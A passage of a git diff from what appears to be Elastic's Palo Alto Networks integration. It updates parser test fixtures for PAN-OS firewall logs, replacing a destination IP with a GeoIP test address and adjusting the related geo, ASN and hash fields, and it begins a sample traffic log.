- "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12332,14 +12398,14 @@ "port": 53150, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -12354,7 +12420,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:O1zDnt5d52xTreiMgL/sHMRHiXA=" + "community_id": "1:dCXhS8309UIWHnl2I7g54l1ldX0=" } }, "threat_category": "unknown", @@ -12399,8 +12465,8 @@ ], "network": { "community_id": [ - "1:pvzPjqjqA6kLTjxiRDVSDxuidwg=", - "1:O1zDnt5d52xTreiMgL/sHMRHiXA=" + "1:t61IasNCmSlxNdbvrIRLnSj8P8I=", + "1:dCXhS8309UIWHnl2I7g54l1ldX0=" ], "transport": "tcp", "application": "ssl", @@ -12439,14 +12505,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768452536Z", - "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692097900Z", + "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -12469,29 +12535,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12507,14 +12572,14 @@ "port": 53185, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -12529,7 +12594,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:CwNRTMQumfdoC3msd4z5PIYkKLU=" + "community_id": "1:iq5uEAaFQc5l1+/OuriPsYrj2wA=" } }, "threat_category": "unknown", @@ -12574,8 +12639,8 @@ ], "network": { "community_id": [ - "1:hu8p8gkxiimZqTLhIkgVfSePEqk=", - "1:CwNRTMQumfdoC3msd4z5PIYkKLU=" + "1:Cro8B/f5RUAAARORnPh3Efkv5Hk=", + "1:iq5uEAaFQc5l1+/OuriPsYrj2wA=" ], "transport": "tcp", "application": "ssl", @@ -12614,14 +12679,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768456420Z", - "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692102700Z", + "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -12644,29 +12709,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12682,14 +12746,14 @@ "port": 53187, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -12704,7 +12768,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:0YBp8myYbHSoKWG2HvxutMfose0=" + "community_id": "1:hYJDTtHYwuZS9LNRhS93bXtUgEA=" } }, "threat_category": "unknown", @@ -12749,8 +12813,8 @@ ], "network": { "community_id": [ - "1:z12wzV1bKYppHPfC9LypWH+RtE4=", - "1:0YBp8myYbHSoKWG2HvxutMfose0=" + "1:L0CSnMLNIOPq4WYcZWeedd+iR9A=", + "1:hYJDTtHYwuZS9LNRhS93bXtUgEA=" ], "transport": "tcp", "application": "ssl", @@ -12789,14 +12853,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768460392Z", - "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692107500Z", + "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -12819,29 +12883,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12857,14 +12920,14 @@ "port": 53188, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -12879,7 +12942,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:CQrsQ2CJN8/aVtRj6kkSqGiLA4w=" + "community_id": "1:VgbZDN+X/hs0C2xqRLVy6lzVPcE=" } }, "threat_category": "unknown", @@ -12924,8 +12987,8 @@ ], "network": { "community_id": [ - "1:eJYKKiIqzYxe5ja/6/hDB3CgzSI=", - "1:CQrsQ2CJN8/aVtRj6kkSqGiLA4w=" + "1:++UGx6mUPvQ+gttOfjNaZwJECq8=", + "1:VgbZDN+X/hs0C2xqRLVy6lzVPcE=" ], "transport": "tcp", "application": "ssl", @@ -12964,14 +13027,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768464585Z", - "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692112200Z", + "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -12994,29 +13057,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -13032,14 +13094,14 @@ "port": 53178, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -13054,7 +13116,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:vbknc+k7pE33+aNpIggpIzlC7MY=" + "community_id": "1:LIyOLbs2SFX0VKFvnleMeqez0os=" } }, "threat_category": "unknown", @@ -13099,8 +13161,8 @@ ], "network": { "community_id": [ - "1:f+00RNTWn2IGrM2JmEAnEPoRwDg=", - "1:vbknc+k7pE33+aNpIggpIzlC7MY=" + "1:iP4eZk++bEMf07vSZ4W2/LKY1jc=", + "1:LIyOLbs2SFX0VKFvnleMeqez0os=" ], "transport": "tcp", "application": "ssl", @@ -13139,14 +13201,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768468595Z", - "original": "Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692116100Z", + "original": "Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:29.000-05:00", "timezone": "America/New_York", "kind": "alert", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log index c3e74310f06..ba304bf40ac 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log @@ -1,100 +1,100 @@ -Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 